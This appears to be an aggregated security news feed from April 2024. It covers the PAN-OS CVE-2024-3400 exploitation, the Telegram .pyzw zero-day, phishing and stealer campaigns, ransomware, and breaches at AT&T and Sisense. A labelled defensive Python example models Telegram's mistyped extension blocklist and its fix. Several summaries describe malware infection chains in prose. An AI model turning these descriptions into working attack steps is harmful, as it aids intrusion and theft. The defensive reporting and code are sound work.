          Palo Alto Networks is warning that a critical flaw impacting its PAN-OS software used in its GlobalProtect gateways is being exploited in the wild. Tracked as CVE-2024-3400, the issue has a CVSS score of 10.0, indicating maximum severity. "A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature "

          Autosummary: "


          TA547 targets German organizations with Rhadamanthys malware

          exploits
          2024-04-12 https://securityaffairs.com/161747/cyber-crime/ta547-targeting-german-orgs.html
Proofpoint researchers observed a threat actor tracked as TA547 targeting dozens of German organizations with an email campaign delivering the Rhadamanthys information stealer. TA547 is a financially motivated threat actor that has been active since at least November 2017 and has been observed conducting multiple […] "

          Autosummary: TA547 is a financially motivated threat actor that has been active since at least November 2017, it was observed conducting multiple campaigns to deliver a variety of Android and Windows malware, including DanaBot, Gootkit, Lumma stealer, NetSupport RAT, Ursnif, and ZLoader. "


          Palo Alto Networks warns of PAN-OS firewall zero-day used in attacks

          exploits
          2024-04-12 https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-pan-os-firewall-zero-day-used-in-attacks/
          Today, Palo Alto Networks warns that an unpatched critical command injection vulnerability in its PAN-OS firewall is being actively exploited in attacks. [...] "

Autosummary: The vendor will implement hotfixes by Sunday with the release of the following versions: PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1 and PAN-OS 11.1.2-h3. Products like Cloud NGFW, Panorama appliances, and Prisma Access are not affected. "


          FBI warns of massive wave of road toll SMS phishing attacks

          financial
          2024-04-12 https://www.bleepingcomputer.com/news/security/fbi-warns-of-massive-wave-of-road-toll-sms-phishing-attacks/
          On Friday, the Federal Bureau of Investigation warned of a massive ongoing wave of SMS phishing attacks targeting Americans with lures regarding unpaid road toll fees. [...] "

Autosummary: [Road toll debt SMS phishing message (Pennsylvania State Police)] Pennsylvania Turnpike, one of the road toll services whose customers were targeted in these attacks, cautioned those receiving the phishing messages not to tap the links. "


          Telegram fixes Windows app zero-day caused by file extension typo

          exploits
          2024-04-12 https://www.bleepingcomputer.com/news/security/telegram-fixes-windows-app-zero-day-caused-by-file-extension-typo/
          Telegram fixed a zero-day vulnerability in its Windows desktop application that could be used to bypass security warnings and automatically launch Python scripts. [...] "

Autosummary: [video.pyzw proof-of-concept exploit (Source: BleepingComputer)] In the demonstration, clicking on the video to watch it causes Python to execute the script, which opens the command prompt. Rather than a client update, Telegram deployed a server-side fix that appends the .untrusted extension to .pyzw files so that, when clicked, Windows asks which program to use to open them instead of automatically launching Python. "


          CVE-2024-3400 exploited: Unit 42, Volexity share more details about the attacks

          exploits
          2024-04-12 https://www.helpnetsecurity.com/2024/04/12/palo-alto-networks-firewalls-cve-2024-3400-exploited/

          Earlier today, Palo Alto Networks revealed that a critical command injection vulnerability (CVE-2024-3400) in the company’s firewalls has been exploited in limited attacks and has urged customers with vulnerable devices to quickly implement mitigations and workarounds. Palo Alto Networks’ Unit 42 and Volexity have now released threat briefs with more information about the attacks, threat hunting queries, YARA rules, and indicators of compromise. PAN’s insights “We are tracking the initial exploitation of this vulnerability under … More

          The post CVE-2024-3400 exploited: Unit 42, Volexity share more details about the attacks appeared first on Help Net Security.

          "

          Autosummary: Palo Alto Networks’ Unit 42 and Volexity have now released threat briefs with more information about the attacks, threat hunting queries, YARA rules, and indicators of compromise. They also explained how the backdoor the attackers installed on targeted devices works, persists, and hides its presence, and have shared threat hunting queries for customers of its Cortex XDR solution. "


          Telegram fixes Windows app zero-day used to launch Python scripts

          exploits
          2024-04-12 https://www.bleepingcomputer.com/news/security/telegram-fixes-windows-app-zero-day-used-to-launch-python-scripts/
          Telegram fixed a zero-day vulnerability in its Windows desktop application that could be used to bypass security warnings and automatically launch Python scripts. [...] "

Autosummary: [video.pyzw proof-of-concept exploit (Source: BleepingComputer)] In the demonstration, clicking on the video to watch it causes Python to execute the script, which opens the command prompt. Rather than a client update, Telegram deployed a server-side fix that appends the .untrusted extension to .pyzw files so that, when clicked, Windows asks which program to use to open them instead of automatically launching Python. "
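Both Telegram items above describe the same defect: a blocklist of risky extensions in which one entry was mistyped, so a .pyzw zipapp was handed straight to the registered Python handler. The Python below is an added example, not Telegram's code. The misspelling it assumes (".pywz" in place of ".pyzw") and the list contents are illustrations, since the article does not reproduce the list; the allow-list policy is this editor's hardening, placed beside the ".untrusted" rename the article describes.

```python
"""Added example, not Telegram's code: how a one-character typo in an
extension blocklist becomes a full bypass, and two ways to close it.

The assumed misspelling ('.pywz' for '.pyzw'), the list contents and the
media allow-list are illustrations for this example.
"""
import os

# Constructed blocklist with the assumed typo: '.pywz' instead of '.pyzw'.
BLOCKLIST_WITH_TYPO = frozenset({".exe", ".bat", ".cmd", ".py", ".pyw", ".pyz", ".pywz"})

# Corrected blocklist.  '.pyzw' is a Python zipapp registered to pythonw.exe,
# so a double-click runs it with no console window.
BLOCKLIST_FIXED = frozenset(
    {".exe", ".bat", ".cmd", ".ps1", ".py", ".pyw", ".pyc", ".pyz", ".pyzw"}
)

# Types the client may hand to the OS default handler without a prompt
# (illustrative allow-list; tune to what the client actually previews inline).
MEDIA_ALLOWLIST = frozenset({".jpg", ".jpeg", ".png", ".gif", ".mp4", ".webm", ".mp3"})


def extension(filename: str) -> str:
    """Lower-cased final extension after the normalisation Windows applies:
    trailing dots and spaces are dropped before the name reaches the shell,
    so 'video.pyzw.' must be judged as 'video.pyzw'."""
    name = filename.rstrip(". ")
    return os.path.splitext(name)[1].lower()


def is_blocked(filename: str, blocklist: frozenset) -> bool:
    """Blocklist check: a missing or misspelled entry lets the file through."""
    return extension(filename) in blocklist


def safe_display_name(filename: str) -> str:
    """Allow-list policy (this editor's hardening): anything that is not a
    known media type gets the '.untrusted' suffix the article describes, so
    Windows asks which program to use instead of launching the registered
    handler."""
    if extension(filename) in MEDIA_ALLOWLIST:
        return filename
    return filename + ".untrusted"


if __name__ == "__main__":
    for name in ("video.pyzw", "VIDEO.PYZW.", "holiday.mp4", "report.pdf"):
        print(
            f"{name!r}: typo list blocks={is_blocked(name, BLOCKLIST_WITH_TYPO)}, "
            f"fixed list blocks={is_blocked(name, BLOCKLIST_FIXED)}, "
            f"served as={safe_display_name(name)!r}"
        )
```

The blocklist check fails open: every extension that is forgotten, mistyped, or newly registered by a runtime becomes an auto-open. Inverting the policy to an allow-list of media types fails closed, and the trailing-dot normalisation matters because Windows strips trailing dots and spaces before resolving the handler, so "video.pyzw." would otherwise slip past an exact-match check.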


          eXotic Visit includes XploitSPY malware – Week in security with Tony Anscombe

          exploits
          2024-04-12 https://www.welivesecurity.com/en/videos/exotic-visit-exploitspy-malware-week-security-tony-anscombe/
          Almost 400 people in India and Pakistan have fallen victim to an ongoing Android espionage campaign called eXotic Visit "

          Autosummary: "


          Colombians grapple with water cuts

          latam
          2024-04-12 https://www.bbc.co.uk/news/world-latin-america-68795101
          About ten million people face water rationing as severe drought brings reservoir levels to record lows. "

          Autosummary: "


          Fortinet Rolls Out Critical Security Patches for FortiClientLinux Vulnerability

          exploits Linux
          2024-04-11 https://thehackernews.com/2024/04/fortinet-has-released-patches-to.html
          Fortinet has released patches to address a critical security flaw impacting FortiClientLinux that could be exploited to achieve arbitrary code execution. Tracked as CVE-2023-45590, the vulnerability carries a CVSS score of 9.4 out of a maximum of 10. "An Improper Control of Generation of Code ("Code Injection") vulnerability [CWE-94] in FortiClientLinux may allow an unauthenticated attacker to "

          Autosummary: "


          Microsoft’s April 2024 Patch Tuesday includes two actively exploited zero-day vulnerabilities

          exploits
          2024-04-11 https://www.malwarebytes.com/blog/news/2024/04/microsofts-april-2024-patch-tuesday-includes-two-actively-exploited-zero-day-vulnerabilities
          Microsoft has fixed 149 vulnerabilities, two of which are reportedly being exploited in the wild. "

          Autosummary: Apparently, the software, designed to remote-control phones, was used to make them act like online bots, collectively liking posts, following people on social media, and posting comments. "


          Digimarc and DataTrails join forces to provide proof of digital content authenticity

          government
          2024-04-11 https://www.helpnetsecurity.com/2024/04/11/digimarc-datatrails-partnership/

          Digimarc and DataTrails have partnered to deliver a fully integrated content protection solution to fortify digital content using advanced digital watermarks in tandem with cryptographic proofs, or fingerprints. Combined with provenance metadata, these technologies create a multi-layered toolset to provide proof of digital content authenticity — protecting content creators, businesses, and consumers from the threat of fake data and misinformation. GenAI has changed the rules in content protection. Today, provenance metadata can easily be stripped … More

          The post Digimarc and DataTrails join forces to provide proof of digital content authenticity appeared first on Help Net Security.

          "

          Autosummary: Solving the content protection challenge Committed to collaboration across industries and the public and private sectors, the Digimarc-DataTrails partnership follows the multi-layered approach to conveying digital media transparency set forth in Partnership on AI’s (PAI) Synthetic Media Framework, a Framework for the ethical and responsible development, creation, and sharing of synthetic media. "


          Microsoft fixed two zero-day bugs exploited in malware attacks

          exploits
          2024-04-11 https://securityaffairs.com/161692/security/two-zero-day-malware-attacks.html
Microsoft addressed two zero-day vulnerabilities, tracked as CVE-2024-29988 and CVE-2024-26234, that threat actors are actively exploiting to deliver malware. Microsoft's Patch Tuesday security updates for April 2024 addressed 147 vulnerabilities in multiple products. This is the highest number of fixed […] "

Autosummary: Microsoft fixed two zero-day bugs exploited in malware attacks. Pierluigi Paganini, April 11, 2024. Microsoft addressed two zero-day vulnerabilities (CVE-2024-29988 and CVE-2024-26234) actively exploited by threat actors to deliver malware. "


          CISA warns about Sisense data breach

          financial
          2024-04-11 https://www.helpnetsecurity.com/2024/04/11/sisense-data-breach/

          Business intelligence / data analytics software vendor Sisense has apparently suffered a data breach that spurred the company and the US Cybersecurity and Infrastructure Security Agency to push the company’s customers to “reset credentials and secrets potentially exposed to, or used to access, Sisense services.” What is known about the Sisense data breach? Details about the security incident are still being kept under wraps by Sisense. A notification by the company’s chief information security officer … More

          The post CISA warns about Sisense data breach appeared first on Help Net Security.

          "

          Autosummary: "


          Ransomware group maturity should influence ransom payment decision

          exploits
          2024-04-11 https://www.helpnetsecurity.com/2024/04/11/ransomware-payment-decision/

          Your organization has been hit by ransomware and a decision has to be made on whether or not to make the ransom payment to get your data decrypted, deleted from attackers’ servers, and/or not leaked online. The decision will depend on a variety of factors but, according to GuidePoint Security, an important one should be the overall maturity and prominence of the ransomware operators who pulled off the attack. Immature ransomware groups: A distinct threat … More

          The post Ransomware group maturity should influence ransom payment decision appeared first on Help Net Security.

          "

          Autosummary: "


          TA547 Phishing Attack Hits German Firms with Rhadamanthys Stealer

          financial
          2024-04-11 https://thehackernews.com/2024/04/ta547-phishing-attack-hits-german-firms.html
          A threat actor tracked as TA547 has targeted dozens of German organizations with an information stealer called Rhadamanthys as part of an invoice-themed phishing campaign. "This is the first time researchers observed TA547 use Rhadamanthys, an information stealer that is used by multiple cybercriminal threat actors," Proofpoint said. "Additionally, the actor appeared to "

Autosummary: TA547 is a prolific, financially motivated threat actor that's known to be active since at least November 2017, using email phishing lures to deliver a variety of Android and Windows malware such as ZLoader, Gootkit, DanaBot, Ursnif, and even Adhubllka ransomware. "


          Palo Alto Networks fixed multiple DoS bugs in its firewalls

          exploits
          2024-04-11 https://securityaffairs.com/161724/security/palo-alto-networks-pan-os-dos-2.html
Palo Alto Networks released security updates addressing several high-severity vulnerabilities in its PAN-OS operating system, including three that can trigger a DoS condition on its firewalls. The company fixed the following DoS vulnerabilities: CVE-2024-3385 – The company reported that a packet processing […] "

Autosummary: Palo Alto Networks fixed multiple DoS bugs in its firewalls. Pierluigi Paganini, April 11, 2024. Palo Alto Networks fixed several vulnerabilities in its PAN-OS operating system, including 3 issues that can trigger a DoS condition on its firewalls. "


          Optics giant Hoya hit with $10 million ransomware demand

          exploits ransomware industry
          2024-04-11 https://www.bleepingcomputer.com/news/security/optics-giant-hoya-hit-with-10-million-ransomware-demand/
          A recent cyberattack on Hoya Corporation was conducted by the "Hunters International" ransomware operation, which demanded a $10 million ransom for a file decryptor and not to release files stolen during the attack. [...] "

          Autosummary: Hunters International is a Ransomware-as-a-Service (RaaS) operation that emerged in mid-2023, whose encryptor shares code with the Hive ransomware operation, indicating a possible rebrand. "


          East Central University suffers BlackSuit ransomware attack

          exploits ransomware
          2024-04-11 https://www.bitdefender.com/blog/hotforsecurity/east-central-university-suffers-blacksuit-ransomware-attack/
          The East Central University (ECU) of Ada, Oklahoma, has revealed that a ransomware gang launched an attack against its systems that left some computers and servers encrypted and may have also seen sensitive information stolen. Read more in my article on the Hot for Security blog. "

          Autosummary: "


          DragonForce ransomware – what you need to know

          exploits ransomware
          2024-04-11 https://www.tripwire.com/state-of-security/dragonforce-ransomware-what-you-need-know
          Learn more about the DragonForce ransomware - how it came to prominence, and some of the unusual tactics used by the hackers who extort money from companies with it. Read more in my article on the Tripwire State of Security blog. "

Autosummary: The similar names should not, of course, be considered proof of a connection - and it's always possible that the name of DragonForce has been chosen intentionally by the ransomware gang to lead investigators off the scent, or as a piece of mischief-making. Like many other ransomware groups, DragonForce attempts to extort money from its victims in two ways - locking companies out of their computers and data through encryption, and exfiltrating data from compromised systems with the threat of releasing it to others via the dark web. "


          CISA makes its "Malware Next-Gen" analysis system publicly available

          exploits
          2024-04-11 https://www.bleepingcomputer.com/news/security/cisa-makes-its-malware-next-gen-analysis-system-publicly-available/
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a new version of "Malware Next-Gen," now allowing the public to submit malware samples for analysis by CISA. [...] "

          Autosummary: "The Cybersecurity and Infrastructure Security Agency (CISA) announces today a new release of our malware analysis system, called Malware Next-Gen, which allows any organization to submit malware samples and other suspicious artifacts for analysis," reads the announcement. "


          CISA adds D-Link multiple NAS devices bugs to its Known Exploited Vulnerabilities catalog

          exploits
          2024-04-11 https://securityaffairs.com/161739/security/cisa-d-link-multiple-nas-devices-bugs-known-exploited-vulnerabilities-catalog.html
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following D-Link multiple NAS devices flaws to its Known Exploited Vulnerabilities (KEV) catalog: The flaw CVE-2024-3272 is a Use of Hard-Coded Credentials Vulnerability impacting D-Link Multiple NAS […] "

          Autosummary: "


          US CISA published an alert on the Sisense data breach

          financial
          2024-04-11 https://securityaffairs.com/161728/data-breach/sisense-suffers-a-cyber-attack.html
Business intelligence software company Sisense suffered a cyberattack that may have exposed sensitive information of major enterprises worldwide. The list of the company’s customers includes Nasdaq, Philips Healthcare, Verizon, and many others. The cyber attack made the headlines […] "

Autosummary: Regards, Sangram Dash, Chief Information Security Officer. The company launched an investigation into the security breach, which is still ongoing. "


          Government should counter misinformation on TikTok - MPs

          government
          2024-04-11 https://www.bbc.com/news/articles/cj5l4e4v350o
          A committee says the government should be more relatable in its communications with the public. "

Autosummary: "


          Cybersecurity jobs available right now: April 10, 2024

          ciber
          2024-04-10 https://www.helpnetsecurity.com/2024/04/10/cybersecurity-jobs-available-right-now-april-10-2024/

          Application Security Engineer HCLTech | Mexico | Remote – View job details As an Application Security Engineer, you will work on the security engineering team and collaborate with other IT professionals to ensure that user data is protected. Cybersecurity Incident Response Specialist Amer Sports | Germany | Hybrid – View job details As an Incident Response Specialist, you’ll play an essential role in proactively preparing for, responding to, and recovering from cybersecurity incidents, ensuring the … More

          The post Cybersecurity jobs available right now: April 10, 2024 appeared first on Help Net Security.

          "

          Autosummary: Cybersecurity Incident Response Specialist Amer Sports | Germany | Hybrid – View job details As an Incident Response Specialist, you’ll play an essential role in proactively preparing for, responding to, and recovering from cybersecurity incidents, ensuring the protection of Amer Sports’ digital assets, and maintaining business continuity. Security Architect ASSA ABLOY Group | Sweden | On-site – View job details The company are seeking a talented and self-motivated individual with expertise in process definition, implementation, monitoring, and improvement, crucial for enhancing ASSA ABLOY’s incident management capabilities. "


          Microsoft Fixes 149 Flaws in Huge April Patch Release, Zero-Days Included

          exploits
          2024-04-10 https://thehackernews.com/2024/04/microsoft-fixes-149-flaws-in-huge-april.html
          Microsoft has released security updates for the month of April 2024 to remediate a record 149 flaws, two of which have come under active exploitation in the wild. Of the 149 flaws, three are rated Critical, 142 are rated Important, three are rated Moderate, and one is rated Low in severity. The update is aside from 21 vulnerabilities that the company addressed in its "

          Autosummary: The two shortcomings that have come under active exploitation are below - CVE-2024-26234 (CVSS score: 6.7) - Proxy Driver Spoofing Vulnerability; CVE-2024-29988 (CVSS score: 8.8) - SmartScreen Prompt Security Feature Bypass Vulnerability. While Microsoft's own advisory provides no information about CVE-2024-26234, cybersecurity firm Sophos said it discovered in December 2023 a malicious executable ("Catalog.exe" or "Catalog Authentication Client Service") that's signed by a valid Microsoft Windows Hardware Compatibility Publisher (WHCP) certificate. "These techniques can bypass the detection and enforcement policies of traditional tools, such as cloud access security brokers, data loss prevention, and SIEMs, by hiding downloads as less suspicious access and sync events," Eric Saraga said. "


          Critical "BatBadBut" Rust Vulnerability Exposes Windows Systems to Attacks

          exploits
          2024-04-10 https://thehackernews.com/2024/04/critical-batbadbut-rust-vulnerability.html
          A critical security flaw in the Rust standard library could be exploited to target Windows users and stage command injection attacks. The vulnerability, tracked as CVE-2024-24576, has a CVSS score of 10.0, indicating maximum severity. That said, it only impacts scenarios where batch files are invoked on Windows with untrusted arguments. "The Rust standard library did not properly escape "

          Autosummary: "


          New ransomware group demands Change Healthcare ransom

          exploits ransomware
          2024-04-10 https://www.malwarebytes.com/blog/threats/2024/04/new-ransomware-group-demands-change-healthcare-ransom
          The Change Healthcare ransomware attack has suffered a third cruel twist. "

          Autosummary: A new ransomware group, RansomHub, has listed the organisation as a victim on its dark web leak site, saying it has 4 TB of “highly selective data,” which relates to “all Change Health clients that have sensitive data being processed by the company.” Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. ALPHV used the ransomware-as-a-service (RaaS) business model, selling the software and infrastructure used to carry out ransomware attacks to criminal gangs known as affiliates, in return for a share of the ransoms they extorted. "


          Upcoming report on the state of cybersecurity in Croatia

          government ciber
          2024-04-10 https://www.helpnetsecurity.com/2024/04/10/upcoming-report-on-the-state-of-cybersecurity-in-croatia/

          Next week, Diverto is set to release a comprehensive report on Croatia’s cybersecurity landscape. This report will provide a detailed summary of the key events from 2023, offer targeted recommendations for managerial strategies, and highlight crucial regulations like NIS2 and DORA. If you’d like to learn more about the report and receive it once released, you can attend a live stream (in Croatian) on Tuesday, April 16. The event will include an expert panel: Ana … More

          The post Upcoming report on the state of cybersecurity in Croatia appeared first on Help Net Security.

          "

          Autosummary: "


          Researchers Uncover First Native Spectre v2 Exploit Against Linux Kernel

          exploits Linux
          2024-04-10 https://thehackernews.com/2024/04/researchers-uncover-first-native.html
          Cybersecurity researchers have disclosed what they say is the "first native Spectre v2 exploit" against the Linux kernel on Intel systems that could be exploited to read sensitive data from the memory. The exploit, called Native Branch History Injection (BHI), can be used to leak arbitrary kernel memory at 3.5 kB/sec by bypassing existing Spectre v2/BHI mitigations, researchers from Systems and "

          Autosummary: The attacks, codenamed Heckler and WeSee, make use of malicious interrupts to break the integrity of CVMs, potentially allowing threat actors to remotely log in and gain elevated access, as well as perform arbitrary read, write, and code injection to disable firewall rules and open a root shell. "


          Webinar: Learn How to Stop Hackers from Exploiting Hidden Identity Weaknesses

          exploits
          2024-04-10 https://thehackernews.com/2024/04/webinar-learn-how-to-stop-hackers-from.html
          We all know passwords and firewalls are important, but what about the invisible threats lurking beneath the surface of your systems? Identity Threat Exposures (ITEs) are like secret tunnels for hackers – they make your security way more vulnerable than you think. Think of it like this: misconfigurations, forgotten accounts, and old settings are like cracks in your digital fortress walls. Hackers "

          Autosummary: Think of it like this: misconfigurations, forgotten accounts, and old settings are like cracks in your digital fortress walls. "


          Cybersecurity in the Evolving Threat Landscape

          ciber
          2024-04-10 https://securityaffairs.com/161661/uncategorized/cybersecurity-in-the-evolving-threat-landscape.html
          As technology evolves and our dependence on digital systems increases, the cybersecurity threat landscape also rapidly changes, posing fresh challenges for organizations striving to protect their assets and data. The battle between cybersecurity defenders and malicious actors rages on in the vast digital expanse of today’s interconnected world. As technology advances and our reliance on […] "

          Autosummary: Building upon the foundational principles of EDR and threat intelligence, XDR integrates data from multiple security controls, such as endpoints, networks, cloud environments, and applications, into one unified platform. As businesses in every sector embrace digital transformation initiatives, adopting cloud computing, Internet of Things (IoT) devices, automation, AI, and interconnected ecosystems, their attack surface widens exponentially. Cybersecurity in the Evolving Threat Landscape, Pierluigi Paganini, April 10, 2024. "


          AT&T now says data breach impacted 51 million customers

          financial
          2024-04-10 https://www.bleepingcomputer.com/news/security/att-now-says-data-breach-impacted-51-million-customers/
          AT&T is sending data breach notifications to 51 million former and current customers, warning them that their personal data was exposed in a hacking forum. However, the company has still not disclosed how the data was obtained. [...] "

          Autosummary: "The [exposed] information varied by individual and account, but may have included full name, email address, mailing address, phone number, social security number, date of birth, AT&T account number and AT&T passcode," reads the notification. "


          Malicious Visual Studio projects on GitHub push Keyzetsu malware

          exploits
          2024-04-10 https://www.bleepingcomputer.com/news/security/malicious-visual-studio-projects-on-github-push-keyzetsu-malware/
          Threat actors are abusing GitHub automation features and malicious Visual Studio projects to push a new variant of the "Keyzetsu" clipboard-hijacking malware and steal cryptocurrency payments. [...] "

          Autosummary: Hidden payload (Source: Checkmarx). The script that executes during the project build consists of a batch script and a base64-encoded PowerShell script that execute successively to perform the following actions: wipe temporary files; retrieve the IP address and determine if the location is Russia; download encrypted files from a specified URL depending on the country code; and decrypt, extract, and execute the downloaded files. "


          Malwarebytes Digital Footprint Portal offers insights into exposed passwords and personal data

          exploits
          2024-04-10 https://www.helpnetsecurity.com/2024/04/10/malwarebytes-digital-footprint-portal/

          Malwarebytes has launched Malwarebytes Digital Footprint Portal, a web portal that gives individuals deep visibility into their exposed personal information, including clear text passwords. Now, anyone can easily see where and when a breach compromised their data, types of data exposed, and specific personal data for sale on the dark web. The web portal also includes clear, actionable recommendations to reduce the resulting risks of identity theft, financial harm or reputation damage. “At Malwarebytes, we … More

          The post Malwarebytes Digital Footprint Portal offers insights into exposed passwords and personal data appeared first on Help Net Security.

          "

          Autosummary: The scan can include an individual’s general information (date of birth, address, phone number), sensitive personal information (social security number, driver’s license number), online digital identifiers (usernames, passwords, devices, networks), financial information (credit card details, bank account information, credit score, salary, estimated net worth, crypto wallet addresses), and more. "


          NICE Actimize enhances Integrated Fraud Management platform to help financial services prevent scams

          financial
          2024-04-10 https://www.helpnetsecurity.com/2024/04/10/nice-actimize-ifm-11/

          NICE Actimize announced IFM 11 (Integrated Fraud Management), a new release of its AI-driven fraud management and detection platform. The new release leverages recent advancements in artificial intelligence together with NICE Actimize’s collective intelligence capabilities to introduce fraud detection accuracy, agility and efficiency to protect financial services firms and their customers from the next generation of AI-driven fraud and scams. This enhanced version is the first solution to deliver AI pervasively across all fraud prevention … More

          The post NICE Actimize enhances Integrated Fraud Management platform to help financial services prevent scams appeared first on Help Net Security.

          "

          Autosummary: "


          Raspberry Robin Returns: New Malware Campaign Spreading Through WSF Files

          exploits
          2024-04-10 https://thehackernews.com/2024/04/raspberry-robin-returns-new-malware.html
          Cybersecurity researchers have discovered a new Raspberry Robin campaign wave that propagates the malware through malicious Windows Script Files (WSFs) since March 2024. "Historically, Raspberry Robin was known to spread through removable media like USB drives, but over time its distributors have experimented with other initial infection vectors," HP Wolf Security researcher Patrick Schläpfer "

          Autosummary: "


          Beware: GitHub's Fake Popularity Scam Tricking Developers into Downloading Malware

          financial exploits
          2024-04-10 https://thehackernews.com/2024/04/beware-githubs-fake-popularity-scam.html
          Threat actors are now taking advantage of GitHub's search functionality to trick unsuspecting users looking for popular repositories into downloading spurious counterparts that serve malware. The latest assault on the open-source software supply chain involves concealing malicious code within Microsoft Visual Code project files that's designed to download next-stage payloads from a remote URL, "

          Autosummary: "In contrast to past incidents where attackers were found to add hundreds or thousands of stars to their repos, it appears that in these cases, the attackers opted for a more modest number of stars, probably to avoid raising suspicion with an exaggerated number," Gelb said. "


          Venezuela's ex-oil minister reappears - in handcuffs

          industry
          2024-04-10 https://www.bbc.co.uk/news/world-latin-america-68779090
          Tareck El Aissami, a former close ally of President Maduro, has been arrested on corruption charges. "

          Autosummary: "


          New Spectre v2 attack impacts Linux systems on Intel CPUs

          Linux
          2024-04-10 https://www.bleepingcomputer.com/news/security/new-spectre-v2-attack-impacts-linux-systems-on-intel-cpus/
          Researchers have demonstrated the "first native Spectre v2 exploit" for a new speculative execution side-channel flaw that impacts Linux systems running on many modern Intel processors. [...] "

          Autosummary: Two attack methods are Branch Target Injection (BTI), which involves manipulating the CPU's branch prediction to execute unauthorized code paths, and Branch History Injection (BHI), which manipulates branch history to cause speculative execution of chosen gadgets (code paths), leading to data leakage. As the CERT Coordination Center (CERT/CC) disclosed yesterday, the new flaw, tracked as CVE-2024-2201, allows unauthenticated attackers to read arbitrary memory data by leveraging speculative execution, bypassing present security mechanisms designed to isolate privilege levels. "


          Malicious PowerShell script pushing malware looks AI-written

          exploits
          2024-04-10 https://www.bleepingcomputer.com/news/security/malicious-powershell-script-pushing-malware-looks-ai-written/
          A threat actor is using a PowerShell script that was likely created with the help of an artificial intelligence system such as OpenAI's ChatGPT, Google's Gemini, or Microsoft's CoPilot. [...] "

          Autosummary: TA547, also known as Scully Spider, has been active since at least 2017 delivering a variety of malware for Windows (ZLoader/Terdot, Gootkit, Ursnif, Corebot, Panda Banker, Atmos) and Android (Mazar Bot, Red Alert) systems. "


          Fortinet fixed a critical remote code execution bug in FortiClientLinux

          exploits Linux
          2024-04-10 https://securityaffairs.com/161674/security/forticlientlinux-rce.html
          Fortinet addressed multiple issues in FortiOS and other products, including a critical remote code execution flaw in FortiClientLinux. Fortinet fixed a dozen vulnerabilities in multiple products, including a critical-severity remote code execution (RCE) issue, tracked as CVE-2023-45590 (CVSS score of 9.4), in FortiClientLinux. The vulnerability is an Improper Control of Generation of Code (‘Code Injection’) […] "

          Autosummary: "


          AT&T states that the data breach impacted 51 million former and current customers

          financial government
          2024-04-10 https://securityaffairs.com/161685/data-breach/att-data-breach-51m-customers.html
          AT&T confirmed that the data breach impacted 51 million former and current customers and is notifying them. AT&T revealed that the recently disclosed data breach impacts more than 51 million former and current customers and is notifying them. In March 2024, more than 70,000,000 records from an unspecified division of AT&T were leaked onto Breached forum, vx-underground […] "

          Autosummary: “Here is the data that is available in this leak: Name, Phone number, Physical address, Email address, Social security number, Date of birth.” The threat actors claimed that the data belonged to AT&T customers in the United States; the group told RestorePrivacy that they were available to support AT&T in securing its systems for a reward. AT&T initially denied any data breach; below is the statement from the telecommunications giant: “Based on our investigation Thursday, the information that appeared in an internet chat room does not appear to have come from our systems.” Later, the telecommunications company retracted its initial denial and confirmed the data breach. "


          Group Health Cooperative data breach impacted 530,000 individuals

          financial
          2024-04-10 https://securityaffairs.com/161693/data-breach/group-health-cooperative-data-breach.html
          Group Health Cooperative of South Central Wisconsin disclosed a data breach that impacted over 500,000 individuals. The Group Health Cooperative of South Central Wisconsin (GHC-SCW) is a non-profit organization that provides health insurance and medical care services to its members in the Madison metropolitan area of Wisconsin. The organization disclosed a data breach after a […] "

          Autosummary: The potentially compromised PHI may have included member/patient name, address, telephone number, e-mail address, date of birth and/or death, social security number, member number, and Medicare and/or Medicaid number. "


          New ransomware group demands Change Healthcare ransom

          exploits ransomware
          2024-04-10 https://www.malwarebytes.com/blog/ransomware/2024/04/new-ransomware-group-demands-change-healthcare-ransom
          The Change Healthcare ransomware attack has suffered a third cruel twist. "

          Autosummary: A new ransomware group, RansomHub, has listed the organisation as a victim on its dark web leak site, saying it has 4 TB of “highly selective data,” which relates to “all Change Health clients that have sensitive data being processed by the company.” Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. ALPHV used the ransomware-as-a-service (RaaS) business model, selling the software and infrastructure used to carry out ransomware attacks to criminal gangs known as affiliates, in return for a share of the ransoms they extorted. "


          Targus discloses cyberattack after hackers detected on file servers

          ciber
          2024-04-09 https://www.bleepingcomputer.com/news/security/targus-discloses-cyberattack-after-hackers-detected-on-file-servers/
          Laptop and tablet accessories maker Targus disclosed that it suffered a cyberattack disrupting operations after a threat actor gained access to the company's file servers. [...] "

          Autosummary: "


          Critical Flaws Leave 92,000 D-Link NAS Devices Vulnerable to Malware Attacks

          exploits
          2024-04-09 https://thehackernews.com/2024/04/critical-flaws-leave-92000-d-link-nas.html
          Threat actors are actively scanning and exploiting a pair of security flaws that are said to affect as many as 92,000 internet-exposed D-Link network-attached storage (NAS) devices. Tracked as CVE-2024-3272 (CVSS score: 9.8) and CVE-2024-3273 (CVSS score: 7.3), the vulnerabilities impact legacy D-Link products that have reached end-of-life (EoL) status. D-Link, in "

          Autosummary: "


          Panama Papers money-laundering trial begins

          financial latam
          2024-04-09 https://www.bbc.com/news/articles/cnek443n8zvo
          The defendants include the founders of law firm Mossack Fonseca which was shut down in 2018. "

          Autosummary: "


          Attackers Using Obfuscation Tools to Deliver Multi-Stage Malware via Invoice Phishing

          financial exploits
          2024-04-09 https://thehackernews.com/2024/04/attackers-using-obfuscation-tools-to.html
          Cybersecurity researchers have discovered an intricate multi-stage attack that leverages invoice-themed phishing decoys to deliver a wide range of malware such as Venom RAT, Remcos RAT, XWorm, NanoCore RAT, and a stealer that targets crypto wallets. The email messages come with Scalable Vector Graphics (SVG) file attachments that, when clicked, activate the infection sequence, Fortinet "

          Autosummary: Also delivered using the plugin system is a stealer that gathers information about the system and exfiltrates data from folders associated with wallets and applications like Atomic Wallet, Electrum, Ethereum, Exodus, Jaxx Liberty (retired as of March 2023), Zcash, Foxmail, and Telegram to a remote server. "


          CL0P's Ransomware Rampage - Security Measures for 2024

          exploits ransomware
          2024-04-09 https://thehackernews.com/2024/04/cl0ps-ransomware-rampage-security.html
